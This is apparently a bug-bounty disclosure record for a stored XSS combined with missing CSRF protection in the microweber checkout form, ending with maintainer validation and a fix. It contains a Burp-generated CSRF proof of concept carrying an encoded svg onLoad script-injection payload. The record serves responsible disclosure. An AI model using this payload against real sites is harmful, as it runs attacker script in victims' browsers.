Cross-site Scripting (XSS) - Stored in microweber/microweber


Reported on

Jun 25th 2021

✍️ Description

Hello, I found CSRF + XSS on website so the impact of XSS could be presented.

There is no CSRF token or protection on: CSRF HTML PoC:

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="first&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="last&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="email" value="asdf&#64;gmail&#46;com" />
      <input type="hidden" name="phone" value="000000000" />
      <input type="submit" value="Submit request" />

and when we submit request XSS gets executed at the same time. Also personal information always stay there so it counts as Stored XSS

Video of me showing everything:

💥 Impact

JS executed on victims browser while the person is in Checkout

a year ago


Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking a way to responsibly disclose this vulnerability. Waiting to hear back; good job!

We have contacted a member of the microweber team and are waiting to hear back a year ago
microweber/microweber maintainer validated this vulnerability a year ago
kirareys has been awarded the disclosure bounty
The fix bounty is now up for grabs
microweber/microweber maintainer confirmed that a fix has been merged on 846a63 a year ago
The fix bounty has been dropped
microweber/microweber maintainer
a year ago

Hello, thank for the report, this is a valid issue and has been fixed now in this commit

a year ago


Nice, thanks for attention :) Regards

to join this conversation